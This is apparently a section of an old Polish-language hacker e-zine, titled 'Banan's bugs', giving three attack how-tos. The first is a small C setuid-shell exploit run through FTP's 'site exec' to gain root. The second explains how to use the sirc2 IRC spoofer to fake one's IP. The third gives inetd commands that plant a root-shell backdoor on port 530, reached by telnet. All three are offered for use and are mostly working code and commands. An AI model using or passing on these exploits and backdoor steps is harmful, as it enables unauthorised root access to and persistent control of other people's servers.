------------------------------------------------------------------------------
XX Banan's bugs :)

 1 Jak zdobyc roota za pomoca ftp : BANAN
 2 Sirc2, czyli irc-owy spoofer   : BANAN
 3 Tylne drzwi na port 530        : BANAN
------------------------------------------------------------------------------
Eeech, wiem, wiem, nie mam czasu :)


1. Jak zdobyc roota, za pomoca ftp : BANAN

Najpierw skompiluj ponizszy exploit i nazwij go suidroot.c
Kompilacja gcc suidroot.c -o suidroot

main() {
  setuid(0);
  seteuid(0);
  system("cp /bin/sh /tmp/suidroot");
  system("chmod a+rwxs /tmp/suidroot");
}

Teraz stworz skrypt o nazwie root.sh:

-- CUT HERE --
#!/bin/sh
exec suidroot
-- CUT HERE --

Teraz ftp, login anonymous, password twoj login@host.com i piszesz

ftp> quote site exec sh root.sh

Teraz wyjdz z ftp i uruchom plik /tmp/suidroot a bedziesz mial roota!!!


2.Sirc2, czyli irc-owy spoofer : BANAN

Programy o nazwach od sirc2 do sirc4, sa to spoofery za pomoca ktorych 
mozesz zmienic swoje ip. Pozwala to na zrobienie paru fajnych rzeczy na
ircu i nie tylko. Ja podam i opisze sirc2, oraz krotko przedstawie jego
funkcje. Spoofer jest dostepny na www p0werfaq. Oto jak go uzyc:

sirc2 1.1.1.1 unseen.org 6667 -i Warlock warlock@lame.com "Doktor Killer" 

Male wyjasnienie co jest co:

1.1.1.1     - twoje ip :)
unseen.org  - serwer irc 
6667        - port serwa irc
Warlock     - pod jakim nickiem bedziesz na irc 
warlock@... - uzytkownik i host pod jakim bedziesz na irc (host musi istniec
              w bazach DNS).
"Doktor..." - Informacja jakie jest twoje prawdziwe imie.


3. Tylne drzwi na port 530 : BANAN

Oto jak sobie zainstalowac prosty backdoor na serwerku. Eech, to raczej
powinno byc w czesci o backdoorach :) Opisane dla linucha, w niektorych
UNIXach demony "mieszkaja" w innym katalogu niz /usr/sbin :) Acha, root sie
przydaje wbrew pozorom :)

% cp /bin/bash /usr/sbin/in.courierd
% chmod 4755 /usr/sbin/in.courierd
% echo "courier stream tcp nowait root /usr/sbin/in.courierd" >>/etc/inetd.conf
% killall -HUP inetd

Tia, a pozniej (wszystkie polecenia koncz znakiem ;)...

% telnet serwer.com 530
Trying 194.204.123.22...

bash# whoami;
root

I to juz koniec :)